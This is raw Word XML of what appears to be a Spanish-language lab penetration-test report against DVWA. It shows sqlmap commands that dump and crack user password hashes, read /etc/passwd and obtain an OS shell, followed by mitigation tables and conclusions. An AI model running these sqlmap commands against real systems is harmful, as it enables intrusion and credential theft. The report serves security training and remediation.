    <w:p w14:paraId="726DEA3C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lastRenderedPageBreak/>
        <w:t>Credenciales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extraídas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p w14:paraId="7DBFEF9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Database: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</w:p>
    <w:p w14:paraId="47574DF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Table: users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B57F6E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[5 entries]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A77F1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+---------+----------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC27AEE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| user    | password                         |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF2C88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+---------+----------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C033172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| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718C8C72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gordonb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| e99a18c428cb38d5f260853678922e03 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F4EDCC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| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5372A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| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E62CF8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| </w:t>
      </w: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smithy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 |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5f4dcc3b5aa765d61d8327deb882cf99 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBF695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+---------+----------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D393AF2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Descifrado de contraseñas (hash cracking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779737EB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Identificación del tipo de hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4922AF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Los hashes extraídos son </w:t>
      </w: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MD5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(32 caracteres hexadecimales). Se procedió a descifrar utilizando la opción de </w:t>
      </w:r>
      <w:proofErr w:type="gram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crack</w:t>
      </w:r>
      <w:proofErr w:type="gram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de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y </w:t>
      </w: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wordlist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personalizada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C49E9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1903F86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485DEF3F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-D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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B01D9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-T users \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6B7A8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-C </w:t>
      </w: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user,password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F47622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--dump \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508C7FD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--batch \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3910BAD0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--crack=rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DB8C63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Resultado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del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descifrado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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA58F1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 xml:space="preserve">Database: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dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="606FA9D1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Table: users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D29AF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[5 entries]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488F6F4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+---------+------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AD2BE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| user    | password   | clear    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B79CB02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+---------+------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6DC4E5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lastRenderedPageBreak/>
        <w:t>| admin   | 5f4dcc3b5a | password |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602775B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gordonb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| e99a18c428 | abc123   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DC808A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| 1337    | 8d3533d75a | </w:t>
      </w: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charley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 |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7A3C26C4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| pablo   | 0d107d09f5 | </w:t>
      </w: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letmein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 |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="70A817F9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| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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smithy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 |</w:t>
      </w:r>
      <w:proofErr w:type="gram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5f4dcc3b5a | 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password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|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BACA58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+---------+------------+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29568EBF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Extracción de archivos del sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AF0E79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proofErr w:type="spell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también permite leer archivos del sistema cuando la configuración de la base de datos lo permite (privilegios FILE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECB370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# Lectura de archivo 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etc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passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="050B3083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sqlmap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 xml:space="preserve"> -u "http://192.168.1.19/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1950B5C8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/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D2B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--cookie="security=low; PHPSESSID=abcd1234efgh5678" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485A893B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--file-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read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="/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etc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/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passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F7286" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2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s-EC"/>
        </w:rPr>
      </w:pPr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--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D2B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06E97392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 xml:space="preserve">Comandos avanzados de </w:t>
      </w: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 xml:space="preserve"> utilizados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799"/>
        <w:gridCol w:w="3628"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="4B62CA7D" w14:textId="77777777" w:rsidTr="000D2B75">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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3694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Comando</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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90D5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Descripción</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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F766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Resultado</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="65B8B528" w14:textId="77777777" w:rsidTr="000D2B75">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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ED5C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os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-shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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4B4F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Intenta obtener una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shell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 del sistema operativo</w:t>
            </w:r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0548E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Éxito con privilegios del usuario web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="02B5C30D" w14:textId="77777777" w:rsidTr="000D2B75">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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BD1C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os-cmd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=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whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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n-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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C580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Ejecuta comando único en el sistema</w:t>
            </w:r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66963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www-data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="30B102B9" w14:textId="77777777" w:rsidTr="000D2B75">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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8732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sql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-shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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B08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Obtiene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shell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interactiva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SQL</w:t>
            </w:r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A91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Ejecución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de queries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personalizadas</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="437F3860" w14:textId="77777777" w:rsidTr="000D2B75">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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24B6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--privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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359E0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Enumeración de privilegios del usuario DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="36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BCDB3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Usuario con privilegios FILE y SUPER</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02A28788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 xml:space="preserve">Resumen de hallazgos con </w:t>
      </w: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SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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543"/>
        <w:gridCol w:w="2835"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="4023C074" w14:textId="77777777" w:rsidTr="000D2B75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618EA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lastRenderedPageBreak/>
              <w:t>Hallazgo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9ECE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Detalle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70E7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Nivel de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Riesgo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="3327F373" w14:textId="77777777" w:rsidTr="000D2B75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B0353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Inyección SQL en parámetro "id"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512E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Vulnerabilidad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confirmada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en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DVWA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3D3C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Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="1B8A57D5" w14:textId="77777777" w:rsidTr="000D2B75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355A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Extracción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de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credenciales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971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5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cuentas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de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usuario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comprometidas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67318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Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="13D606B9" w14:textId="77777777" w:rsidTr="000D2B75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4073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Hash MD5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descifrado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D4CDA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Contraseñas débiles (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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, abc123, etc.)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A0F34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Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="71EAF29A" w14:textId="77777777" w:rsidTr="000D2B75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CAFF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Lectura de archivos del sistema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5885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Posible lectura de /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etc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/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passwd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 y otros archivos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BAC3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Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="449F1ED0" w14:textId="77777777" w:rsidTr="000D2B75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9ED5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Posible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ejecución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 xml:space="preserve"> de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comandos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3E685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Permite acceso a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shell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 del sistema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F5F12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Crítico</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="276DF345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>Mitigación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401A7283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Propuestas para remediar las vulnerabilidades explotadas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A7DA44" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B7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1. Para VSFTPD 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6D31E7" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Actualización inmediata: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Actualizar a versión 2.3.5 o superior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B204489" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Parche de seguridad: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Aplicar parches específicos para el backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF1F889" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Restricción de acceso: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Limitar acceso FTP a redes de confianza mediante firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D88586" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Monitoreo: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Implementar detección de intentos de explotación del backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8732ED" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B7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2. Para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configuración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SUID de Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B9B8B7" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Remoción del bit SUID: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Ejecutar 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chmod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u-s /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usr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/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bin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/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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DF01FD1" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Política de privilegios mínimos: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 Implementar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sudoers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configurado específicamente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60017EDF" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Alternativas seguras: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Usar capacidades de Linux en lugar de SUID cuando sea posible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D2B12" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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Auditoría periódica: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Ejecutar regularmente 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find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/ -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perm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-4000 -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type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f para identificar binarios SUID innecesarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1A2741" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B7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lastRenderedPageBreak/>
        <w:t>3. Para vulnerabilidades de inyección SQL (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SQLmap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969"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="50377A98" w14:textId="77777777" w:rsidTr="00B15693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E10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Medida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790C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Descripción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A158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Prioridad</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="65E34549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F9F3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Prepared Statements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FCC3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Implementar consultas parametrizadas en lugar de concatenación de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strings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84B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Crítica</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="3DEB09C8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600D2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Validación</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 de entrada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696E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Filtrar y validar todos los inputs del usuario en el lado del servidor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8571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Crítica</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="42200D3F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30D4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Principio de </w:t>
            </w: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mínimo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 privilegio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4666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 xml:space="preserve">Usar cuentas de base de datos con permisos mínimos (no usar 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root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3819B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Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="7A62947F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90021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WAF (Web Application Firewall)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6CE74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Implementar firewall de aplicaciones web para detectar patrones de inyección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AF12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Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="1C49DF40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7CDD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Almacenamiento</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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seguro</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 de </w:t>
            </w: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contraseñas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074C5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Usar algoritmos de hash robustos (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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bcrypt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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, Argon2) en lugar de MD5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5DDE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Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="76553A68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5D4F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Desactivar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 FILE privileges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8F57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Si no es necesario, revocar privilegios de lectura/escritura de archivos al usuario DB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EF2C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Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000D2B75" w:rsidRPr="000D2B75" w14:paraId="2B73DD90" w14:textId="77777777" w:rsidTr="00B15693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E964D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Auditoría</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000D2B7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/>
              </w:rPr>
              <w:t>código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DED0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s-EC"/>
              </w:rPr>
              <w:t>Realizar revisiones de código para identificar patrones inseguros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8BF69" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B7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</w:pPr>
            <w:r w:rsidRPr="000D2B75">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17079C8E" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B7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4.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Recomendaciones</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000D2B75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generales</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A0DB2C1" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693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Hardening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 del sistema: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Aplicar guías de seguridad para distribución específica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F4E50" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693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Actualizaciones automáticas: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Configurar actualizaciones de seguridad automáticas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BC0F62" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693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Monitoreo de logs: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Implementar SIEM para detección de actividades sospechosas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A6DE8B" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693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Segmentación de red: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 Aislar sistemas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legacy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en redes separadas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B46053" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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lastRenderedPageBreak/>
        <w:t>Capacitación en desarrollo seguro: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Formar a desarrolladores en prácticas seguras (OWASP Top 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE0244C" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B7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3"/>
          <w:szCs w:val="33"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t>Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADD50C6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Impacto de las vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77709B9C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Las vulnerabilidades identificadas presentan un riesgo crítico para el sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360EAE27" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Acceso remoto sin autenticación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mediante backdoor en servicio esencial (FTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3BD905" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Ejecución de código como </w:t>
      </w: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root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desde el momento inicial de compromiso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F018043" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Escalada de privilegios trivial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debido a mala configuración de permisos SUID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A27677" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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 xml:space="preserve">Inyección SQL automatizada con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Extracción masiva de credenciales y datos sensibles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA76AD3" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Exposición completa del sistema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a actores maliciosos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BA184F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30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t>Reflexión sobre el proceso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3943920D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El ejercicio demostró la importancia crítica de:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7046C03B" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Actualizaciones oportunas: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El backdoor de VSFTPD 2.3.4 es conocido desde 2011</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65498A86" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Configuración segura por defecto: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 El bit SUID en herramientas como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nmap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es innecesario para la mayoría de </w:t>
      </w:r>
      <w:proofErr w:type="gram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casos</w:t>
      </w:r>
      <w:proofErr w:type="gram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de uso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51541085" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Monitoreo proactivo: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La detección temprana podría haber prevenido la explotación exitosa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210A8FFE" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Principio de mínimo privilegio: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 Los servicios no deberían ejecutarse como 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root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cuando es posible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D42B64D" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Validación de entradas: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La inyección SQL sigue siendo una de las vulnerabilidades más comunes en aplicaciones web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73587632" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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Herramientas automatizadas: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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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SQLmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B15693">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t xml:space="preserve"> permite a atacantes extraer información sensible en minutos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BB4E48" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="000D2B75" w:rsidRDefault="000D2B75" w:rsidP="000D2B7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/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart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>Recomendación</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000D2B75">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> final</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B6EC35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Se recomienda inmediata remediación de las vulnerabilidades identificadas, en particular:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B90951A" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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lastRenderedPageBreak/>
        <w:t>Prioridad 1 (Crítica):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Parchear VSFTPD y eliminar backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B4FD34" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Prioridad 2 (Crítica):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Eliminar bit SUID de binarios innecesarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E62B058" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/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Prioridad 3 (Alta):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Corregir vulnerabilidades de inyección SQL en aplicaciones web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1414EF" w14:textId="77777777" w:rsidR="000D2B75" w:rsidRPr="00B15693" w:rsidRDefault="000D2B75" w:rsidP="00B15693">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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B15693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Prioridad 4 (Alta):</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15693">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="es-EC"/>
        </w:rPr>
        <w:t> Implementar almacenamiento seguro de contraseñas</w:t>
      </w:r>
    </w:p>
